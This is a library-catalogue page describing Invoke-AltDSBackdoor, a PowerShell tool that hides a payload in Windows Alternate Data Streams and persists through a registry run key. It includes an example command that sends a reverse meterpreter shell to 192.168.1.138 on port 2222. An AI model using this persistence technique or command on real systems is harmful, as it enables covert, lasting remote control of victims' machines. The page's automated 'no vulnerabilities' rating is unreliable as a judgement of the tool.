Invoke-AltDSBackdoor | obtain persistence on a Windows | Command Line Interface library
kandi X-RAY | Invoke-AltDSBackdoor Summary
kandi X-RAY | Invoke-AltDSBackdoor Summary
Invoke-AltDSBackdoor is a PowerShell library typically used in Utilities, Command Line Interface applications. Invoke-AltDSBackdoor has no bugs, it has no vulnerabilities and it has low support. You can download it from GitHub.
This script will obtain persistence on a Windows 7+ machine under both Standard and Administrative accounts by using two Alternate Data Streams. The first Alternate Data stream stores the payloadand the second Alternate Data Stream stores some VBScript that acts as a wrapper in order to hide the DOS prompt when invoking the data stream containing the payload. When passing the arguments, you have to include the function and any parameters required by your payload. The arguments must also be in quotation marks. Example: PS C:\Users\test\Desktop> Invoke-ADSBackdoor -URL -Arguments "Invoke-Shellcode -Lhost 192.168.1.138 -LPort 2222 -Payload windows/meterpreter/reverse_https -Force" This will use the function Invoke-Shellcode in Invoke-Shellcode.ps1 to shovel meterpreter back to 192.168.1.138 on port 2222 over HTTPS. The Remove-ADSBackdoor cmdlet will parse the registry run key, extract both ADS locations, remove them using Remove-ADS, and will then remove the registry run key. Example: PS C:\Users\test\Desktop> Remove-ADSBackdoor.
This script will obtain persistence on a Windows 7+ machine under both Standard and Administrative accounts by using two Alternate Data Streams. The first Alternate Data stream stores the payloadand the second Alternate Data Stream stores some VBScript that acts as a wrapper in order to hide the DOS prompt when invoking the data stream containing the payload. When passing the arguments, you have to include the function and any parameters required by your payload. The arguments must also be in quotation marks. Example: PS C:\Users\test\Desktop> Invoke-ADSBackdoor -URL -Arguments "Invoke-Shellcode -Lhost 192.168.1.138 -LPort 2222 -Payload windows/meterpreter/reverse_https -Force" This will use the function Invoke-Shellcode in Invoke-Shellcode.ps1 to shovel meterpreter back to 192.168.1.138 on port 2222 over HTTPS. The Remove-ADSBackdoor cmdlet will parse the registry run key, extract both ADS locations, remove them using Remove-ADS, and will then remove the registry run key. Example: PS C:\Users\test\Desktop> Remove-ADSBackdoor.
Support
Quality
Security
License
Reuse
Support
Invoke-AltDSBackdoor has a low active ecosystem.
It has 103 star(s) with 62 fork(s). There are 14 watchers for this library.
It had no major release in the last 6 months.
Invoke-AltDSBackdoor has no issues reported. There are no pull requests.
It has a neutral sentiment in the developer community.
The latest version of Invoke-AltDSBackdoor is current.
Quality
Invoke-AltDSBackdoor has no bugs reported.
Security
Invoke-AltDSBackdoor has no vulnerabilities reported, and its dependent libraries have no vulnerabilities reported.
License
Invoke-AltDSBackdoor does not have a standard license declared.
Check the repository for any license declaration and review the terms closely.
Without a license, all rights are reserved, and you cannot use the library in your applications.
Reuse
Invoke-AltDSBackdoor releases are not available. You will need to build from source code and install.
Top functions reviewed by kandi - BETA
kandi's functional review helps you automatically verify the functionalities of the libraries and avoid rework.
Currently covering the most popular Java, JavaScript and Python libraries. See a Sample of Invoke-AltDSBackdoor
Currently covering the most popular Java, JavaScript and Python libraries. See a Sample of Invoke-AltDSBackdoor
Invoke-AltDSBackdoor Key Features
No Key Features are available at this moment for Invoke-AltDSBackdoor.
Invoke-AltDSBackdoor Examples and Code Snippets
No Code Snippets are available at this moment for Invoke-AltDSBackdoor.
Community Discussions
Trending Discussions on Invoke-AltDSBackdoor
QUESTION
Web-scraping with PowerShell Issue: My code won't pull in the needed information. Why?
Asked 2021-Feb-01 at 10:04
Web-scraping with PowerShell Issue: My code won't pull in the needed information. Why?
My code up to this point will pull the correct information. the info it shows is:
...ANSWER
Answered 2021-Feb-01 at 02:06Replace:
Community Discussions, Code Snippets contain sources that include Stack Exchange Network
Vulnerabilities
No vulnerabilities reported
Install Invoke-AltDSBackdoor
You can download it from GitHub.
Support
For any new features, suggestions and bugs create an issue on GitHub.
If you have any questions check and ask questions on community page Stack Overflow .
Find more information at:
Reuse Trending Solutions
Find, review, and download reusable Libraries, Code Snippets, Cloud APIs from over 650 million Knowledge Items
Find more librariesStay Updated
Subscribe to our newsletter for trending solutions and developer bootcamps
Share this Page